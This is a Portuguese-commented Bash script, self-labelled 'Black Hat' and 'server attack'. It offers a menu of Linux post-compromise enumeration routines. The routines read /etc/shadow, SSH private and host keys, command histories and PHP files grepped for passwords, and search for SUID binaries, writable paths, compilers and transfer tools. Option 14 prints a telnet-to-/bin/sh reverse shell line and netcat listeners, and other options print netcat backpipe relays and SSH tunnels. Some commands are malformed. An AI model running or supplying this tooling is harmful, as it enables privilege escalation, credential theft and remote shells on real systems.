Forense [server attack]

#!/bin/bash

############
# FUNCAO 1 #
############

# Apresentacao
apresentacao()
{

    clear
#   printf "     \e[1;92m.-\"\"\"\"-. \e[0m\n"
#   printf "    \e[1;92m/        \ \e[0m\n"
#   printf " \e[1;77m  \e[0m\e[1;92m/_        _\ \e[0m\n"
#   printf "\e[1;77m  \e[0m\e[1;92m// \      / \\ \e[0m\n"
#   printf "\e[1;77m  \e[0m\e[1;92m|\__\    /__/ \e[0m\n"
#   printf "\e[1;77m  \e[0m\e[1;92m\    ||    / \e[0m\n"
#   printf "\e[1;77m   \e[0m\e[1;92m\        / \e[0m\n"
#   printf "\e[1;92m \e[0m   \e[1;92m\  __  / \e[0m\n"
#   printf "     \e[1;92m'.__.' \e[0m\n\n"

#   echo -e "\033[01;33m###################################\033[01;37m"
    echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
    echo -e "\033[31;5m Black Hat DarkProgrammer000 \n\033[0m"
#   echo -e "\033[01;33m###################################\033[01;37m"
#   echo ""
}

#############
# FUNCOES 2 #
#############

#1) Distribuicao e Versao do SO
1()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Distribuicao e Versao do S.O #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/issue)"
            "$(cat /etc/*-release)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#2) Versao e arquitetura do Kernel
2()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Arquitetura do KERNEL #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /proc/version)"
            "$(uname -a)"
            "$(uname -mrs)"
            "$(rpm -q kernel)"
            "$(dmesg | grep -i Linux)"
            "$(ls /boot | grep -i vmlinuz-)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#3) Verificacao de variaveis de ambiente
3()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Variaveis de ambiente #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/profile)"
            "$(cat /etc/bashrc)"
            "$(cat ~/.bash_profile)"
            "$(cat ~/.bashrc)"
            "$(cat ~/.bash_logout)"
            "$(env)"
            "$(set)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#4) Verificacao de aplicacoes e privilegios
4()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Aplicacoes e privilegios #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ps aux)"
            "$(ps -ef)"
            "$(cat /etc/services)"
            #"$(top)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#5) Verificacao de aplicacoes e servicoes e privilegios pelo ROOT
5()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Servicos executados pelo ROOT#####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ps -aux | grep -i root)"
            "$(ps -ef | grep -i root)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}


#6) Verificacao de aplicacoes instaladas
6()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Aplicacoes instaladas e executando #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -alh /usr/bin/)"
            "$(ls -alh /sbin/)"
            "$(dpkg -l)"
            "$(rpm -qa)"
            "$(ls -alh /var/cache/apt/archives)"
            "$(ls -alh /var/cache/apt/yum)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#7) Aplicacoes mal configuradas
7()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar aplicacoes mal configuradas #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/inetd.conf)"
            "$(cat /etc/inetd.conf)"
            "$(cat /etc/chttp.conf)"
            "$(cat /etc/lighttpd.conf)"
            "$(cat /etc/cups/cupsd.conf)"
            "$(cat /etc/apache2/apache2.confcrontab -l)"
            "$(cat /etc/syslog.conf)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#8) Verificacao se há agendamentos
8()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Agendamentos #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -alh /var/spool/cron)"
            "$(ls -al /etc/ | grep cron)"
            "$(ls -al /etc/cron*)"
            "$(cat /etc/cron*)"
            "$(cat /etc/mysql/my.cnf)"
            "$(cat /etc/crontab)"
            "$(cat /etc/at.allow)"
            "$(cat /etc/at.deny)"
            "$(cat /etc/cron.allow)"
            "$(cat /etc/cron.deny)"
            "$(cat /etc/anacrontab)"
            "$(cat /var/spool/cron/crontabs/root)"
            "$(cat /etc/my.conf)"
            "$(cat /etc/httpd/conf/httpd.conf)"
            "$(cat /opt/lampp/etc/httpd.conf)"
            "$(ls -arl /etc | awk \'$1 ~ /^.*r.*/\')"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#9) Procurar por username e senha em texto claro
9()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por 'username' e 'senha' em texto claro #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find /var -name "*.php" -print0 | xargs -0 grep -i -n "user" --color)"
            "$(find /etc -name "*.php" -print0 | xargs -0 grep -i -n "user" --color)"
            "$(find /var -name "*.php" -print0 | xargs -0 grep -i -n "pass" --color)"
            "$(find /etc -name "*.php" -print0 | xargs -0 grep -i -n "pass" --color)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#10) Verificar dispositivos de rede
10()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Dispositivos de rede #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/network/interfaces)"
            "$(/sbin/ifconfig -a)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#11) Verificacao configuracoes de rede
11()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Configuracoes de rede #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/resolv.conf)"
            "$(cat /etc/systemd/networkd.conf)"
            "$(cat /etc/networks)"
            "$(iptables -L)"
            "$(hostname)"
            "$(dnsdomainname)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#12) Verificar conexoes
12()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Verificar conexoes #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(lsof -i)"
            "$(lsof -i :80)"
            "$(grep 80 /etc/services)"
            "$(netstat -antup)"
            "$(netstat -antpx)"
            "$(netstat -tulpn)"
            "$(last)"
            "$(w)"
            "$(chkconfig --list)"
            "$(chkconfig --list | grep 3:on)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#13) Verificar rotas e cache arp
13()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Rotas e cache arp #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(arp -e)"
            "$(route)"
            "$(/sbin/route -nee)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#14) Verificar se a shell interativo
14()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Shell interativo #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("nc -lvp 4444"
            "nc -lvp 4445"
            "telnet 192.168.0.16 666 | /bin/sh | 192.168.0.1 80"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Verificacao de possibilidade de encaminhamento de trafego
15()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Possibilidade de encaminhamento de trafego #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("ssh -R 8080:127.0.0.1:80 root@192.168.0.19)"
            "ssh -L 8080:127.0.0.1:80 root@192.168.0.19)"
            "mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe"
            "mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe"
            "mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#16) Verificacao possibilidade de Tunelamento de SSH
16()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Possibilidade de Tunelamento de SSH #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("ssh -D 127.0.0.1:9050 -N root@192.168.0.19"
            "proxychains ifconfig"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}
#17) Verifcar quem esta logado e quem pode ler, escrever e executar
17()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Quem esta logado, quem pode ler, escrever e executar #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(id)"
            "$(who)"
            "$(w)"
            "$(last)"
            "$(cat /etc/passwd | cut -d: -f1)"
            "$(grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}')"
            "$(cat /etc/sudoers)"
            "$(sudo -l)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#18) Procurar por arquivos sensiveis
18()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por arquivos sensiveis #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(/etc/passwd)"
            "$(/etc/group)"
            "$(/etc/shadow)"
            "$(ls -alh /var/mail/)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#19) Procurar por informações de interesse no home e diretório root
19()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por informacoes de interesse no home e diretorio root #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -ahlR /root/)"
            "$(ls -ahlR /home/)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#20) Procurar por senha em arquivos de logs, scripts e databasss em caminho padrao
20()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por senha em arquivos de logs, scripts e databases em caminho padrao #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /var/apache2/config.inc)"
            "$(cat /var/lib/mysql/mysql/user.MYD)"
            "$(cat /root/anaconda-ks.cfg)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) O que o usuario tem no seu history
21()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### O que o usuario tem no seu history #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat ~/.bash_history)"
            "$(cat ~/.nano_history)"
            "$(cat ~/.atftp_history)"
            "$(cat ~/.mysql_history)"
            "$(cat ~/.php_history)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Procurar por mais informacoes de usuarios
22()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por mais informacoes de usuarios  #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat ~/.bashrc)"
            "$(cat ~/.profile)"
            "$(cat /var/mail/root)"
            "$(cat /var/spool/mail/root)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Procurar por chaves privadas ssh
23()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por chaves privadas ssh #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat ~/.ssh/authorized_keys)"
            "$(cat ~/.ssh/identity.pub)"
            "$(cat ~/.ssh/identity)"
            "$(cat ~/.ssh/id_rsa.pub)"
            "$(cat ~/.ssh/id_rsa)"
            "$(cat ~/.ssh/id_dsa.pub)"
            "$(cat ~/.ssh/id_dsa)"
            "$(cat /etc/ssh/ssh_config)"
            "$(cat /etc/ssh/sshd_config)"
            "$(cat /etc/ssh/ssh_host_dsa_key.pub)"
            "$(cat /etc/ssh/ssh_host_dsa_key)"
            "$(cat /etc/ssh/ssh_host_rsa_key.pub)"
            "$(cat /etc/ssh/ssh_host_rsa_key)"
            "$(cat /etc/ssh/ssh_host_key.pub)"
            "$(cat /etc/ssh/ssh_host_key)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Verificar se ha arquivos no /etc/que podem ser editados ou que possam ser reconfigurados
24()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Verificar se ha arquivos no /etc/que podem ser editados ou que possam ser reconfigurados #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null)"
            "$(ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null)"
            "$(ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null)"
            "$(ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null)"
            "$(find /etc/ -readable -type f 2>/dev/null)"
            "$(find /etc/ -readable -type f -maxdepth 1 2>/dev/null)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#25) Procurar por arquivos em /var
25()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por arquivos em /var #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -alh /var/log)"
            "$(ls -alh /var/mail)"
            "$(ls -alh /var/spool)"
            "$(ls -alh /var/spool/lpd)"
            "$(ls -alh /var/lib/pgsql)"
            "$(ls -alh /var/lib/mysql)"
            "$(cat /var/lib/dhcp3/dhclient.leases)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#26) Procurar por informacoes em arquivos ocultos em website ou informacoes em bancos de dados
26()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por informacoes em arquivos ocultos em website ou informacoes em bancos de dados #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(ls -alhR /var/www/)"
            "$(ls -alhR /srv/www/htdocs/)"
            "$(ls -alhR /usr/local/www/apache22/data/)"
            "$(ls -alhR /opt/lampp/htdocs/)"
            "$(ls -alhR /var/www/html/)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#27) Procurar por informacoes em arquivos de logs
27()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por informacoes em arquivos de logs #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/httpd/logs/access_log)"
            "$(cat /etc/httpd/logs/access.log)"
            "$(cat /etc/httpd/logs/error_log)"
            "$(cat /etc/httpd/logs/error.log)"
            "$(cat /var/log/apache2/access_log)"
            "$(cat /var/log/apache2/access.log)"
            "$(cat /var/log/apache2/error_log)"
            "$(cat /var/log/apache2/error.log)"
            "$(cat /var/log/apache/access_log)"
            "$(cat /var/log/apache/access.log)"
            "$(cat /var/log/auth.log)"
            "$(cat /var/log/chttp.log)"
            "$(cat /var/log/cups/error_log)"
            "$(cat /var/log/dpkg.log)"
            "$(cat /var/log/faillog)"
            "$(cat /var/log/httpd/access_log)"
            "$(cat /var/log/httpd/access.log)"
            "$(cat /var/log/httpd/error_log)"
            "$(cat /var/log/httpd/error.log)"
            "$(cat /var/log/lastlog)"
            "$(cat /var/log/lighttpd/access.log)"
            "$(cat /var/log/lighttpd/error.log)"
            "$(cat /var/log/lighttpd/lighttpd.access.log)"
            "$(cat /var/log/lighttpd/lighttpd.error.log)"
            "$(cat /var/log/messages)"
            "$(cat /var/log/secure)"
            "$(cat /var/log/syslog)"
            "$(cat /var/log/wtmp)"
            "$(cat /var/log/xferlog)"
            "$(cat /var/log/yum.log)"
            "$(cat /var/run/utmp)"
            "$(cat /var/webmin/miniserv.log)"
            "$(cat /var/www/logs/access_log)"
            "$(cat /var/www/logs/access.log)"
            "$(ls -alh /var/lib/dhcp3/)"
            "$(ls -alh /var/log/postgresql/)"
            "$(ls -alh /var/log/proftpd/)"
            "$(ls -alh /var/log/samba/)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#28) Mudar de um shell cachorro para um shell mais interativo com python
28()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Mudar de um shell cachorro para um shell mais interativo com python #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr="python -c \"import pty; pty.spawn('/bin/bash')\""

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#29) Verificar com o sistema de arquivos está montado
29()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Verificar com o sistema de arquivos esta montado #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(mount)"
            "$(df -h)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Verificar se há sistema de arquivos desmontado
30()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Verificar se ha sistema de arquivos desmontado #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(cat /etc/fstab)")

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#31) Verificar permissoes avancadas (Sticky bits, SUID e GUID)
31()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Verificar permissões avançadas (Sticky bits, SUID e GUID) #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find / -perm -1000 -type d 2>/dev/null)"
            "$(find / -perm -g=s -type f 2>/dev/null)"
            "$(find / -perm -u=s -type f 2>/dev/null)"
            "$(find / -perm -g=s -o -perm -u=s -type f 2>/dev/null)"
            "$(for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done)"
            "$(find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#32) Procurar por locais onde se pode escrever e executar arquivos
32()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por locais onde se pode escrever e executar arquivos #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find / -writable -type d 2>/dev/null)"
            "$(find / -perm -222 -type d 2>/dev/null )"
            "$(find / -perm -o w -type d 2>/dev/null)"
            "$(find / -perm -o x -type d 2>/dev/null )"
            "$(find / \( -perm -o w -perm -o x \) -type d 2>/dev/null )"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#33) Procurar por arquivos graváveis por nobody
33()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Procurar por arquivos gravaveis por nobody #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print)"
            "$(find /dir -xdev \( -nouser -o -nogroup \) -print)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Quais ferramentas de compilação e desenvolvimento podem ser usadas para construir um exploit
34()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Quais ferramentas de compilacao e desenvolvimento podem ser usadas para construir um exploit #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find / -name perl*)"
            "$(find / -name python*)"
            "$(find / -name gcc*)"
            "$(find / -name cc*)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

#a) Quais ferrametas de transferência de arquivos existem
35()
{
    # Apresentacao
    clear
    echo -e "\033[01;32m##### Quais ferramentas de transferência de arquivos existem #####\n\033[01;37m"

    # Estrutura de repeticao: for + array
    declare -a arr=("$(find / -name wget)"
            "$(find / -name nc*)"
            "$(find / -name netcat*)"
            "$(find / -name tftp*)"
            "$(find / -name ftp)"
            )

    # Chamada de metodo: Leitura de array
    leitura_lista
}

###################
# Sessao controle #
###################

# Estrutura de repeticao da leitura de lista dos comandos de todas as funcoes
leitura_lista()
{

    # Exemplo de lista:
    # declare -a arr=("$(COMANDO)" "$(COMANDO)" "$(COMANDO)")

    for i in "${arr[@]}"
    do
        echo -e "\033[01;34m$i \n\033[01;37m"
    done

    # Pause para leitura
    echo -e "\033[01;32m\n<<Enter>>\033[01;37m"
    read
}

# Montagem de menu principal
controle_menu()
{
    # Montagem de um array list
    declare -a arr=("Distribuicao e versao do sistema operacional"
                "Arquitetura do Kernel"
            "Variaveis de Ambiente"
            "Aplicacoes e Privilegios"
            "Servicos executados pelo ROOT"
            "Aplicacoes Instaladas"
            "Aplicacoes Mal configuradas"
            "Agendamentos"
            "Procurando -> login e senha"
            "Dispositivos de rede"
            "Configuracoes de rede"
            "Verificar conexoes"
            "Rotas e cache arp"
            "Shell interativo "
            "Encaminhamento de trafego"
            "Tunelamento SSH"
            "Usuario -> logado, ler, escrever e executar"
            "Arquivos sensiveis"
            "Informacoes -> /home e /root"
            "Procurando -> Senha em arquivos de logs, scripts e databases"
            "Historico de comandos"
            "Informacoes -> Usuarios"
            "Chaves privadas SSH"
            "Arquivos no /etc/ -> Editados ou Reconfigurados"
            "Procurando -> Arquivos em /var"
            "Procurando -> Arquivos ocultos em website ou em bancos de dados"
            "Procurando -> Arquivos de logs"
            "Shell TTY"
            "Sistema de arquivos montado "
            "Sistema de arquivos desmontado"
            "Permissoes avancadas (Sticky bits, SUID e GUID)"
            "Procurando -> Locais onde se pode escrever e executar arquivos"
            "Procura -> Arquivos gravaveis"
            "Ferramentas -> Exploits"
            "Ferramentas -> Transferencia de arquivos"
            )

    # Tamanho do vetor: ${#arr[@]}
    # Estrutura em loop (estilo C))
    # $i(indice): ${arr[$i]} (conteudo na lista)

    echo -e "\033[01;35m# MENU PRINCIPAL \033[01;37m"

    for (( i=0; i < ${#arr[@]}; i++))
    do
        echo -e "\033[01;33m # [$((i+1))]: ${arr[$i]} \033[01;37m"
    done

    echo -e "\033[01;31m # [0]: Sair \n\033[01;37m"
    echo -n -e "\033[01;37m# Opc.: \033[01;37m"
    read opc
}

# Estrutura em escolha
escolha()
{
    case $opc in
    1)  1;;
    2)  2;;
    3)  3;;
    4)  4;;
    5)  5;;
    6)  6;;
    7)  7;;
    8)  8;;
    9)  9;;
    10)     10;;
    11) 11;;
    12)     12;;
    13)     13;;
    14)     14;;
    15)     15;;
    16)     16;;
    17)     17;;
    18)     18;;
    19)     19;;
    20)     20;;
    21)     21;;
    22)     22;;
    23)     23;;
    24)     24;;
    25)     25;;
    26)     26;;
    27)     27;;
    28)     28;;
    29)     29;;
    30)     30;;
    31)     31;;
    32)     32;;
    33)     33;;
    34)     34;;
    35)     35;;
    0)    ;;
    *)    ;;
    esac
}

# Controle de fluxo
Programa()
{
    while ((1))
    do
        apresentacao
        controle_menu
        escolha

        if (( opc == 0 ))
        then
            break
        else
            continue
        fi
    done
}

######################
# Programa principal #
######################

# Execucao do programa
Programa